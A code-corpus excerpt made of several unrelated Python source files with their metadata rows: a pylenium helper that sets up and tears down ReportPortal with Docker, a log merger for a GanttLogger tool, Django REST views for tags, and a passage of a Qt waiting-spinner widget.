1. Download the ReportPortal `docker-compose.yml` file as "docker-compose.report-portal.yml"
2. Setup permissions for ElasticSearch
3. Configure the `YAML` file based on OS
4. `docker-compose up`
5. Open ReportPortal and login (change password afterwards)
"""
import platform
from pylenium.scripts import cli_utils
def __stop_containers():
    """ Stop all ReportPortal containers.

    Stops every container whose name matches 'reportportal', using shell
    command substitution on POSIX or a cmd.exe FOR /f loop on Windows.

    Returns:
        `CompletedProcess`

    Raises:
        `EnvironmentError` if the stop command exits non-zero.
    """
    command = 'docker stop $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
    if platform.system() == 'Windows':
        # cmd.exe has no $(...) substitution; iterate container names instead.
        command = "FOR /f \"tokens=*\" %i IN " \
                  "('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
                  "DO docker stop %i"
    stop_containers_response = cli_utils.run_process(command, shell=True)
    if stop_containers_response.returncode != 0:
        raise EnvironmentError(f'[FAILED] {command}'
                               '\n\nUnable to stop ReportPortal containers:'
                               '\n * Make sure Docker is installed and running'
                               '\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
                               f'\nResponse: {stop_containers_response}')
    return stop_containers_response
def __remove_containers():
    """ Remove all ReportPortal containers that are stopped.

    Mirrors __stop_containers: shell command substitution on POSIX,
    a cmd.exe FOR /f loop on Windows.

    Returns:
        `CompletedProcess`

    Raises:
        `EnvironmentError` if the removal command exits non-zero.
    """
    if platform.system() == 'Windows':
        command = ("FOR /f \"tokens=*\" %i IN "
                   "('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') "
                   "DO docker rm %i")
    else:
        command = 'docker rm $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
    result = cli_utils.run_process(command, shell=True)
    if result.returncode != 0:
        raise EnvironmentError(f'[FAILED] {command}'
                               '\n\nUnable to remove ReportPortal containers after stopping them.'
                               f'\nResponse: {result}')
    return result
def download_compose_yaml_file():
    """ Download the ReportPortal docker-compose.yml file.

    Saves it as "docker-compose.report-portal.yml" in the current working
    directory, so running this from the Project Root is recommended.

    Returns:
        `CompletedProcess` if successful.

    Raises:
        `ConnectionError` if process returns non-zero status code.
    """
    curl_args = [
        'curl', 'https://raw.githubusercontent.com/reportportal/reportportal/master/docker-compose.yml',
        '-o', './docker-compose.report-portal.yml'
    ]
    result = cli_utils.run_process(curl_args)
    if result.returncode == 0:
        return result
    raise ConnectionError(f'\n\nUnable to download docker-compose file from ReportPortal repo. '
                          f'\nResponse: {result}')
def compose_up():
    """ Spin up a ReportPortal instance using docker-compose.report-portal.yml.

    Runs docker-compose detached, recreating containers if they exist.

    Returns:
        `CompletedProcess`

    Raises:
        `EnvironmentError` if process returns non-zero status code.
    """
    response = cli_utils.run_process([
        'docker-compose', '-p', 'reportportal',   # prefix containers with 'reportportal'
        '-f', 'docker-compose.report-portal.yml', # use our auto-generated compose.yml
        'up', '-d', '--force-recreate'            # spin up in detached, "daemon mode"
    ])
    if response.returncode != 0:
        raise EnvironmentError('\n\nUnable to run "docker-compose" command to create ReportPortal instance.'
                               '\n * Make sure Docker is installed and running'
                               '\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
                               f'\nResponse: {response}')
    return response
def down():
    """ Tear down the ReportPortal instance.

    This does not use the docker-compose.report-portal.yml file because,
    depending on Docker version, you may or may not have a network created
    that is not handled by docker-compose down.

    1. Stop all reportportal containers
    2. Kill (remove) all reportportal containers
    3. Remove the reportportal_default network (depends on docker version)

    Returns:
        `CompletedProcess` of the network-removal step.

    Raises:
        `EnvironmentError` if stopping or removing the containers fails.
    """
    __stop_containers()
    __remove_containers()
    # The network may never have existed on some Docker versions, so this
    # result is returned to the caller unchecked rather than raised on.
    remove_network_response = cli_utils.run_process([
        'docker', 'network', 'rm', 'reportportal_default'
    ])
    return remove_network_response
| 38.341463
| 119
| 0.6338
|
import platform
from pylenium.scripts import cli_utils
def __stop_containers():
command = 'docker stop $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
if platform.system() == 'Windows':
command = "FOR /f \"tokens=*\" %i IN " \
"('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
"DO docker stop %i"
stop_containers_response = cli_utils.run_process(command, shell=True)
if stop_containers_response.returncode != 0:
raise EnvironmentError(f'[FAILED] {command}'
'\n\nUnable to stop ReportPortal containers:'
'\n * Make sure Docker is installed and running'
'\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
f'\nResponse: {stop_containers_response}')
return stop_containers_response
def __remove_containers():
command = 'docker rm $(docker ps -a -f "name=reportportal" --format "{{.Names}}")'
if platform.system() == 'Windows':
command = "FOR /f \"tokens=*\" %i IN " \
"('docker ps -a -f \"name=reportportal\" --format \"{{.Names}}\"') " \
"DO docker rm %i"
remove_containers_response = cli_utils.run_process(command, shell=True)
if remove_containers_response.returncode != 0:
raise EnvironmentError(f'[FAILED] {command}'
'\n\nUnable to remove ReportPortal containers after stopping them.'
f'\nResponse: {remove_containers_response}')
return remove_containers_response
def download_compose_yaml_file():
response = cli_utils.run_process([
'curl', 'https://raw.githubusercontent.com/reportportal/reportportal/master/docker-compose.yml',
'-o', './docker-compose.report-portal.yml'
])
if response.returncode != 0:
raise ConnectionError(f'\n\nUnable to download docker-compose file from ReportPortal repo. '
f'\nResponse: {response}')
return response
def compose_up():
response = cli_utils.run_process([
'docker-compose', '-p', 'reportportal',
'-f', 'docker-compose.report-portal.yml',
'up', '-d', '--force-recreate'
])
if response.returncode != 0:
raise EnvironmentError('\n\nUnable to run "docker-compose" command to create ReportPortal instance.'
'\n * Make sure Docker is installed and running'
'\n * Make sure this command is run in the same dir as docker-compose.report-portal.yml'
f'\nResponse: {response}')
return response
def down():
__stop_containers()
__remove_containers()
remove_network_response = cli_utils.run_process([
'docker', 'network', 'rm', 'reportportal_default'
])
return remove_network_response
| true
| true
|
f71925bd9fe55e2d80c707e532175799b9940cd4
| 147
|
py
|
Python
|
src/radical/pilot/worker/__init__.py
|
eirrgang/radical.pilot
|
ceccd1867dd172935d602ff4c33a5ed4467e0dc8
|
[
"MIT"
] | 47
|
2015-03-16T01:08:11.000Z
|
2022-02-02T10:36:39.000Z
|
src/radical/pilot/worker/__init__.py
|
eirrgang/radical.pilot
|
ceccd1867dd172935d602ff4c33a5ed4467e0dc8
|
[
"MIT"
] | 1,856
|
2015-01-02T09:32:20.000Z
|
2022-03-31T21:45:06.000Z
|
src/radical/pilot/worker/__init__.py
|
eirrgang/radical.pilot
|
ceccd1867dd172935d602ff4c33a5ed4467e0dc8
|
[
"MIT"
] | 28
|
2015-06-10T18:15:14.000Z
|
2021-11-07T04:36:45.000Z
|
__copyright__ = "Copyright 2016, http://radical.rutgers.edu"
__license__ = "MIT"
from .update import Update
from .stager import Stager
| 16.333333
| 60
| 0.714286
|
__copyright__ = "Copyright 2016, http://radical.rutgers.edu"
__license__ = "MIT"
from .update import Update
from .stager import Stager
| true
| true
|
f71925dc3984013ee3e549051b9ebf44316eb766
| 8,888
|
py
|
Python
|
exe/modules/Merger.py
|
KagenoMoheji/ActiveTabGanttLogger
|
2d7c88e1c48d56126904d14e780a2588c69336fc
|
[
"MIT"
] | null | null | null |
exe/modules/Merger.py
|
KagenoMoheji/ActiveTabGanttLogger
|
2d7c88e1c48d56126904d14e780a2588c69336fc
|
[
"MIT"
] | null | null | null |
exe/modules/Merger.py
|
KagenoMoheji/ActiveTabGanttLogger
|
2d7c88e1c48d56126904d14e780a2588c69336fc
|
[
"MIT"
] | null | null | null |
import os
import sys
import platform
import datetime
from modules.Public import StrFormatter
class Merger:
    """Merge per-session GanttLogger log folders into one timestamped folder.

    Must be run with the current working directory set to "ganttlogger_logs".
    Output goes to a new sibling folder named "merged_<YYYYmmdd_HHMMSS>".
    """
    currdir = ""    # Absolute path of the "ganttlogger_logs" directory.
    mergedir = ""   # Output directory for the merged log files.
    # Which log kinds the user chose to merge (filled in by start()).
    run_merge = {
        "active_tab": False,
        "mouse": False,
        "keyboard": False
    }
    strfmr = None   # StrFormatter used for colored console messages.

    def __init__(self):
        '''
        Merge logs in folders in "ganttlogger_logs".
        '''
        self.strfmr = StrFormatter()
        # Refuse to run anywhere but inside a folder named "ganttlogger_logs".
        self.currdir = os.getcwd()
        is_win = "Windows" in platform.platform(terse=True)
        if is_win:
            curr_name = self.currdir.split("\\")[-1]
        else:
            curr_name = self.currdir.split("/")[-1]
        if curr_name != "ganttlogger_logs":
            print(self.strfmr.get_colored_console_log("red",
                "Error: You must move to a folder 'ganttlogger_logs'."))
            sys.exit()
        self.mergedir = "{currdir}/merged_{datetime}".format(
            currdir=self.currdir,
            datetime=datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))

    def start(self):
        """Prompt for which logs to merge, create the output folder, then merge."""
        try:
            select_log_names = set(["active_tab", "mouse", "keyboard"])
            while True:
                print(self.strfmr.get_colored_console_log("yellow",
                    "Select 'all' or names separated by ',' from ('active_tab'|'mouse'|'keyboard').: "), end="")
                input_select = list(map(lambda s: s.strip(), (input().strip()).split(",")))
                if not input_select[0]:
                    print(self.strfmr.get_colored_console_log("red",
                        "Error: Invalid input."))
                    continue
                elif "all" in input_select:
                    if len(input_select) == 1:
                        self.run_merge["active_tab"] = True
                        self.run_merge["mouse"] = True
                        self.run_merge["keyboard"] = True
                        break
                    else:
                        print(self.strfmr.get_colored_console_log("red",
                            "Error: Too many select despite 'all'."))
                        continue
                else:
                    # The input is valid iff every entered name is a known log
                    # name: the symmetric difference then contains only the
                    # unchosen (still valid) names.
                    xor_select = set(input_select) ^ select_log_names
                    if len(xor_select) == 0 or \
                        all(x in select_log_names for x in xor_select):
                        if "active_tab" in input_select:
                            self.run_merge["active_tab"] = True
                        if "mouse" in input_select:
                            self.run_merge["mouse"] = True
                        if "keyboard" in input_select:
                            self.run_merge["keyboard"] = True
                        break
                    else:
                        print(self.strfmr.get_colored_console_log("red",
                            "Error: There are some invalid names."))
                        continue
            # Create the folder the merged logs are written into.
            os.makedirs(os.path.dirname("{}/".format(self.mergedir)), exist_ok=True)
            print("Created an output folder '{}'.".format(self.mergedir))
            self.run()
        except KeyboardInterrupt:
            print("Exit")
            sys.exit()

    def run(self):
        """Collect log folders sorted by README StartDate and merge the selected logs."""
        # Directories inside "ganttlogger_logs", excluding previous "merged*" outputs.
        log_folders = {f: None for f in os.listdir(self.currdir)
                       if (os.path.isdir(os.path.join(self.currdir, f))) and (not "merged" in f)}
        remove_keys_list = []
        for key in log_folders.keys():
            readme = "{dir}/{folder}/README.txt".format(dir=self.currdir, folder=key)
            if not os.path.exists(readme):
                remove_keys_list.append(key)
                continue
            # Look for a "StartDate" row within the first 4 lines of README.txt.
            has_startdate = False
            row_startdate = ""
            with open(readme, "r", encoding="utf-8") as f:
                for row in range(4):
                    row_startdate = f.readline()
                    if "StartDate" in row_startdate:
                        has_startdate = True
                        break
            if not has_startdate:
                print(self.strfmr.get_colored_console_log("yellow",
                    "Warning: File '{readme}' doesn't have a row 'StartDate'.".format(readme=readme)))
                remove_keys_list.append(key)
                continue
            # Remember each folder's start datetime so folders can be ordered.
            try:
                log_folders[key] = datetime.datetime.strptime(
                    (row_startdate.split(": ")[-1]).strip(), "%Y/%m/%d %H:%M:%S.%f")
            except ValueError:
                print(self.strfmr.get_colored_console_log("red",
                    "Error: Invalid format of a value of 'StartDate' in {readme}.".format(readme=readme)))
                sys.exit()
        # Drop folders with no usable README/StartDate.
        for k in remove_keys_list:
            log_folders.pop(k)
        # Sort folders by StartDate ascending so logs concatenate chronologically.
        log_folders = dict(sorted(log_folders.items(), key=lambda x: x[1]))
        if self.run_merge["active_tab"]:
            self.merge_active_tab_logs(log_folders)
        if self.run_merge["mouse"]:
            self.merge_mouse_logs(log_folders)
        if self.run_merge["keyboard"]:
            self.merge_keyboard_logs(log_folders)

    def merge_active_tab_logs(self, sorted_folders_dict):
        """Merge every folder's active_tab.log into one file."""
        self.__merge_logs(sorted_folders_dict, "active_tab",
                          "StartTime]:+:[ApplicationName]:+:[TabText\n",
                          "StartTime]:+:[", "ActiveTab merged!")

    def merge_mouse_logs(self, sorted_folders_dict):
        """Merge every folder's mouse.log into one file."""
        self.__merge_logs(sorted_folders_dict, "mouse",
                          "Time]:+:[MoveDistance\n",
                          "Time]:+:[", "Mouse merged!")

    def merge_keyboard_logs(self, sorted_folders_dict):
        """Merge every folder's keyboard.log into one file."""
        self.__merge_logs(sorted_folders_dict, "keyboard",
                          "Time]:+:[PressCount\n",
                          "Time]:+:[", "Keyboard merged!")

    def __merge_logs(self, sorted_folders_dict, log_name, header, header_marker,
                     done_message):
        """Shared worker for the three merge_* methods (was copy-pasted 3x).

        Concatenates <folder>/<log_name>.log of every folder (already in
        StartDate order) into <mergedir>/<log_name>.log, writing `header`
        once and skipping each source file's own header line (detected via
        `header_marker` in its first line). Exits on a missing source file.
        """
        with open("{mergedir}/{name}.log".format(mergedir=self.mergedir, name=log_name),
                  "a", encoding="utf-8") as af:
            af.write(header)
            for folder in sorted_folders_dict:
                try:
                    filedir = "{currdir}/{folder}/{name}.log".format(
                        currdir=self.currdir, folder=folder, name=log_name)
                    with open(filedir, "r", encoding="utf-8") as rf:
                        log = rf.read().strip()  # Remove the last "\n"
                        splitted_log = log.split("\n", 1)
                        if header_marker in splitted_log[0]:
                            log = splitted_log[1]
                        log += "\n"
                        af.write(log)
                except FileNotFoundError:
                    print(self.strfmr.get_colored_console_log("red",
                        "Error: File '{filedir}' not found.".format(filedir=filedir)))
                    sys.exit()
        print(done_message)
| 48.568306
| 143
| 0.507426
|
import os
import sys
import platform
import datetime
from modules.Public import StrFormatter
class Merger:
currdir = ""
mergedir = ""
run_merge = {
"active_tab": False,
"mouse": False,
"keyboard": False
}
strfmr = None
def __init__(self):
self.strfmr = StrFormatter()
self.currdir = os.getcwd()
is_win = "Windows" in platform.platform(terse=True)
curr_name = ""
if is_win:
curr_name = self.currdir.split("\\")[-1]
else:
curr_name = self.currdir.split("/")[-1]
if curr_name != "ganttlogger_logs":
print(self.strfmr.get_colored_console_log("red",
"Error: You must move to a folder 'ganttlogger_logs'."))
sys.exit()
self.mergedir = "{currdir}/merged_{datetime}".format(currdir=self.currdir, datetime=datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
def start(self):
try:
select_log_names = set(["active_tab", "mouse", "keyboard"])
while True:
print(self.strfmr.get_colored_console_log("yellow",
"Select 'all' or names separated by ',' from ('active_tab'|'mouse'|'keyboard').: "), end="")
input_select = list(map(lambda s: s.strip(), (input().strip()).split(",")))
if not input_select[0]:
print(self.strfmr.get_colored_console_log("red",
"Error: Invalid input."))
continue
elif "all" in input_select:
if len(input_select) == 1:
self.run_merge["active_tab"] = True
self.run_merge["mouse"] = True
self.run_merge["keyboard"] = True
break
else:
print(self.strfmr.get_colored_console_log("red",
"Error: Too many select despite 'all'."))
continue
else:
xor_select = set(input_select) ^ select_log_names
if len(xor_select) == 0 or \
all(x in select_log_names for x in xor_select):
if "active_tab" in input_select:
self.run_merge["active_tab"] = True
if "mouse" in input_select:
self.run_merge["mouse"] = True
if "keyboard" in input_select:
self.run_merge["keyboard"] = True
break
else:
print(self.strfmr.get_colored_console_log("red",
"Error: There are some invalid names."))
continue
os.makedirs(os.path.dirname("{}/".format(self.mergedir)), exist_ok=True)
print("Created an output folder '{}'.".format(self.mergedir))
self.run()
except KeyboardInterrupt:
print("Exit")
sys.exit()
def run(self):
log_folders = {f: None for f in os.listdir(self.currdir) if (os.path.isdir(os.path.join(self.currdir, f))) and (not "merged" in f)}
remove_keys_list = []
for key in log_folders.keys():
readme = "{dir}/{folder}/README.txt".format(dir=self.currdir, folder=key)
if not os.path.exists(readme):
remove_keys_list.append(key)
continue
has_startdate = False
row_startdate = ""
with open(readme, "r", encoding="utf-8") as f:
for row in range(4):
row_startdate = f.readline()
if "StartDate" in row_startdate:
has_startdate = True
break
if not has_startdate:
print(self.strfmr.get_colored_console_log("yellow",
"Warning: File '{readme}' doesn't have a row 'StartDate'.".format(readme=readme)))
remove_keys_list.append(key)
continue
try:
log_folders[key] = datetime.datetime.strptime((row_startdate.split(": ")[-1]).strip(), "%Y/%m/%d %H:%M:%S.%f")
except ValueError:
print(self.strfmr.get_colored_console_log("red",
"Error: Invalid format of a value of 'StartDate' in {readme}.".format(readme=readme)))
sys.exit()
for k in remove_keys_list:
log_folders.pop(k)
log_folders = dict(sorted(log_folders.items(), key=lambda x:x[1]))
# log_folders: {log_folders}
# """.format(log_folders=log_folders))
if self.run_merge["active_tab"]:
self.merge_active_tab_logs(log_folders)
if self.run_merge["mouse"]:
self.merge_mouse_logs(log_folders)
if self.run_merge["keyboard"]:
self.merge_keyboard_logs(log_folders)
def merge_active_tab_logs(self, sorted_folders_dict):
with open("{mergedir}/active_tab.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("StartTime]:+:[ApplicationName]:+:[TabText\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/active_tab.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip()
splitted_log = log.split("\n", 1)
if "StartTime]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("ActiveTab merged!")
def merge_mouse_logs(self, sorted_folders_dict):
with open("{mergedir}/mouse.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("Time]:+:[MoveDistance\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/mouse.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip()
splitted_log = log.split("\n", 1)
if "Time]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("Mouse merged!")
def merge_keyboard_logs(self, sorted_folders_dict):
with open("{mergedir}/keyboard.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
af.write("Time]:+:[PressCount\n")
for folder in sorted_folders_dict:
try:
filedir = "{currdir}/{folder}/keyboard.log".format(currdir=self.currdir, folder=folder)
with open(filedir, "r", encoding="utf-8") as rf:
log = rf.read().strip()
splitted_log = log.split("\n", 1)
if "Time]:+:[" in splitted_log[0]:
log = splitted_log[1]
log += "\n"
af.write(log)
except FileNotFoundError:
print(self.strfmr.get_colored_console_log("red",
"Error: File '{filedir}' not found.".format(filedir=filedir)))
sys.exit()
print("Keyboard merged!")
| true
| true
|
f7192642ac4e4ccc76acb1a05c82ae929b697a48
| 3,870
|
py
|
Python
|
website/src/globaly/rest_api.py
|
iamcholo/videoplatform
|
72dd1db73e1c940e5992dacbb63feb8fc11394e3
|
[
"Apache-2.0"
] | null | null | null |
website/src/globaly/rest_api.py
|
iamcholo/videoplatform
|
72dd1db73e1c940e5992dacbb63feb8fc11394e3
|
[
"Apache-2.0"
] | 9
|
2020-06-05T19:18:35.000Z
|
2022-03-11T23:30:50.000Z
|
website/src/globaly/rest_api.py
|
iamcholo/videoplatform
|
72dd1db73e1c940e5992dacbb63feb8fc11394e3
|
[
"Apache-2.0"
] | null | null | null |
import json
from django.conf import settings
from django.http import Http404, HttpResponseRedirect, HttpResponse
from django.conf.urls import url, include
from rest_framework import routers, serializers, viewsets, generics
from rest_framework import status
from rest_framework.decorators import api_view, authentication_classes, permission_classes
from rest_framework.response import Response
from rest_framework.parsers import JSONParser
from rest_framework import generics
from globaly.models import GlobalyTags
from django.contrib.auth.models import User
from user.rest_authentication import IsAuthenticated
from django.db.models import Q
from decimal import Decimal as D
from django.db.models import Max
from django.utils.translation import ugettext_lazy as _
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
class GlobalyTagsSerializer(serializers.HyperlinkedModelSerializer):
    # Serializer used by the tag REST endpoints below to expose GlobalyTags
    # rows; the listed model fields are serialized as-is.
    class Meta:
        model = GlobalyTags
        fields = (
            'id',
            'name',
            'slug',
            'meta_title',
            'meta_description',
            'publish',
            'created',
            'modified',
        )
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def tag_list(request):
    """Return every tag whose `autor` is the authenticated user."""
    if request.method == 'GET':
        own_tags = GlobalyTags.objects.filter(autor=request.user)
        serialized = GlobalyTagsSerializer(own_tags, many=True,
                                           context={'request': request})
        return Response(serialized.data)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def tag_details(request):
    """Return one tag, looked up by 'id' in the POST body.

    Responds 404 both when the tag does not exist and when it belongs to a
    different user (ownership is hidden behind a 404 rather than a 403).
    """
    if request.method == 'POST':
        try:
            requested_tag = GlobalyTags.objects.get(pk=request.data.get('id'))
            if requested_tag.autor != request.user:
                return Response(status=status.HTTP_404_NOT_FOUND)
        except GlobalyTags.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        serialized = GlobalyTagsSerializer(requested_tag,
                                           context={'request': request})
        return Response(serialized.data)
    # Unreachable with api_view(['POST']); kept for parity with the original.
    return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['PUT','POST','DELETE'])
@permission_classes((IsAuthenticated,))
def tag(request):
    """Create (POST), update (PUT) or delete (DELETE) a tag.

    POST creates a tag owned by the caller. PUT/DELETE look the tag up by
    the integer 'id' field of the request body, answering 404 when absent.
    Invalid serializer data yields 400 with the field errors.
    """
    method = request.method
    if method == 'POST':
        serializer = GlobalyTagsSerializer(data=request.data,
                                           context={'request': request})
        if not serializer.is_valid():
            return Response(serializer.errors,
                            status=status.HTTP_400_BAD_REQUEST)
        serializer.save(autor=request.user)
        return Response(serializer.data)
    if method in ('PUT', 'DELETE'):
        try:
            target = GlobalyTags.objects.get(pk=int(request.data.get('id')))
        except GlobalyTags.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        if method == 'DELETE':
            target.delete()
            return Response(status=status.HTTP_204_NO_CONTENT)
        # PUT: validate and persist the update.
        serializer = GlobalyTagsSerializer(target, data=request.data,
                                           context={'request': request})
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data)
        return Response(serializer.errors,
                        status=status.HTTP_400_BAD_REQUEST)
| 30.714286
| 90
| 0.605685
|
import json
from django.conf import settings
from django.http import Http404, HttpResponseRedirect, HttpResponse
from django.conf.urls import url, include
from rest_framework import routers, serializers, viewsets, generics
from rest_framework import status
from rest_framework.decorators import api_view, authentication_classes, permission_classes
from rest_framework.response import Response
from rest_framework.parsers import JSONParser
from rest_framework import generics
from globaly.models import GlobalyTags
from django.contrib.auth.models import User
from user.rest_authentication import IsAuthenticated
from django.db.models import Q
from decimal import Decimal as D
from django.db.models import Max
from django.utils.translation import ugettext_lazy as _
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
class GlobalyTagsSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = GlobalyTags
fields = (
'id',
'name',
'slug',
'meta_title',
'meta_description',
'publish',
'created',
'modified',
)
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def tag_list(request):
if request.method == 'GET':
tags = GlobalyTags.objects.filter(autor=request.user)
serializer = GlobalyTagsSerializer(
tags,
many=True,
context={'request': request}
)
return Response(serializer.data)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def tag_details(request):
if request.method == 'POST':
try:
pk = request.data.get('id')
tag = GlobalyTags.objects.get(
pk=pk
)
if tag.autor != request.user:
return Response(
status=status.HTTP_404_NOT_FOUND
)
except GlobalyTags.DoesNotExist:
return Response(
status=status.HTTP_404_NOT_FOUND
)
serializer = GlobalyTagsSerializer(
tag,
context={'request': request}
)
return Response(serializer.data)
return Response(
status=status.HTTP_204_NO_CONTENT
)
@api_view(['PUT','POST','DELETE'])
@permission_classes((IsAuthenticated,))
def tag(request):
if request.method == 'POST':
serializer = GlobalyTagsSerializer(
data=request.data,
context={'request': request}
)
if serializer.is_valid():
serializer.save(autor=request.user)
return Response(serializer.data)
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
if request.method == 'PUT' or request.method == 'DELETE':
try:
pk = request.data.get('id')
tag = GlobalyTags.objects.get(
pk=int(pk)
)
except GlobalyTags.DoesNotExist:
return Response(
status=status.HTTP_404_NOT_FOUND
)
if request.method == 'PUT':
serializer = GlobalyTagsSerializer(
tag,
data=request.data,
context={'request': request}
)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
if request.method == 'DELETE':
tag.delete()
return Response(
status=status.HTTP_204_NO_CONTENT
)
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
| true
| true
|
f719265545a7052a735de005b48163850981877d
| 8,764
|
py
|
Python
|
spyder/widgets/waitingspinner.py
|
suokunlong/spyder
|
2d5d450fdcef232fb7f38e7fefc27f0e7f704c9a
|
[
"MIT"
] | 3
|
2019-09-27T21:00:00.000Z
|
2021-03-07T23:28:32.000Z
|
spyder/widgets/waitingspinner.py
|
jastema/spyder
|
0ef48ea227c53f57556cd8002087dc404b0108b0
|
[
"MIT"
] | 3
|
2020-10-13T21:15:23.000Z
|
2020-10-13T21:15:24.000Z
|
spyder/widgets/waitingspinner.py
|
jastema/spyder
|
0ef48ea227c53f57556cd8002087dc404b0108b0
|
[
"MIT"
] | 2
|
2021-04-30T01:18:22.000Z
|
2021-09-19T06:31:42.000Z
|
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2012-2014 Alexander Turkin
Copyright (c) 2014 William Hallatt
Copyright (c) 2015 Jacob Dawid
Copyright (c) 2016 Luca Weiss
Copyright (c) 2017- Spyder Project Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
See NOTICE.txt in the Spyder repository root for more detailed information.
Minimally adapted from waitingspinnerwidget.py of the
`QtWaitingSpinner Python Fork <https://github.com/z3ntu/QtWaitingSpinner>`_.
A port of `QtWaitingSpinner <https://github.com/snowwlex/QtWaitingSpinner>`_.
"""
import math
from qtpy.QtCore import QRect, Qt, QTimer
from qtpy.QtGui import QColor, QPainter
from qtpy.QtWidgets import QWidget
class QWaitingSpinner(QWidget):
    """Animated "waiting" spinner widget (adapted from QtWaitingSpinner).

    Draws ``_numberOfLines`` rounded lines arranged in a ring and advances a
    fading highlight around it on a QTimer, producing a spinning effect.
    """

    def __init__(self, parent, centerOnParent=True,
                 disableParentWhenSpinning=False, modality=Qt.NonModal):
        QWidget.__init__(self, parent)
        self._centerOnParent = centerOnParent
        self._disableParentWhenSpinning = disableParentWhenSpinning
        # Appearance/animation defaults (formerly in an initialize() helper).
        self._color = QColor(Qt.black)
        self._roundness = 100.0
        self._minimumTrailOpacity = 3.14159265358979323846
        self._trailFadePercentage = 80.0
        self._trailSizeDecreasing = False
        self._revolutionsPerSecond = 1.57079632679489661923
        self._numberOfLines = 20
        self._lineLength = 10
        self._lineWidth = 2
        self._innerRadius = 10
        self._currentCounter = 0
        self._isSpinning = False
        self._timer = QTimer(self)
        self._timer.timeout.connect(self.rotate)
        self.updateSize()
        self.updateTimer()
        self.hide()
        self.setWindowModality(modality)
        self.setAttribute(Qt.WA_TranslucentBackground)

    def paintEvent(self, QPaintEvent):
        """Paint every line, fading (and optionally shrinking) them with
        distance from the primary line."""
        self.updatePosition()
        painter = QPainter(self)
        painter.fillRect(self.rect(), Qt.transparent)
        painter.setRenderHint(QPainter.Antialiasing, True)
        if self._currentCounter >= self._numberOfLines:
            self._currentCounter = 0
        painter.setPen(Qt.NoPen)
        for i in range(0, self._numberOfLines):
            painter.save()
            painter.translate(self._innerRadius + self._lineLength,
                              self._innerRadius + self._lineLength)
            rotateAngle = float(360 * i) / float(self._numberOfLines)
            painter.rotate(rotateAngle)
            painter.translate(self._innerRadius, 0)
            distance = self.lineCountDistanceFromPrimary(
                i, self._currentCounter, self._numberOfLines)
            color = self.currentLineColor(
                distance, self._numberOfLines, self._trailFadePercentage,
                self._minimumTrailOpacity, self._color)
            # Compute the scaling factor to apply to the size and thickness
            # of the lines in the trail.
            if self._trailSizeDecreasing:
                sf = (self._numberOfLines - distance) / self._numberOfLines
            else:
                sf = 1
            painter.setBrush(color)
            rect = QRect(0, round(-self._lineWidth / 2),
                         round(sf * self._lineLength),
                         round(sf * self._lineWidth))
            painter.drawRoundedRect(
                rect, self._roundness, self._roundness, Qt.RelativeSize)
            painter.restore()

    def start(self):
        """Show the spinner, optionally disable the parent, start the timer."""
        self.updatePosition()
        self._isSpinning = True
        self.show()
        # Bug fix: the original tested `self.parentWidget` (the bound method,
        # always truthy) instead of calling it; stop() already calls it.
        if self.parentWidget() and self._disableParentWhenSpinning:
            self.parentWidget().setEnabled(False)
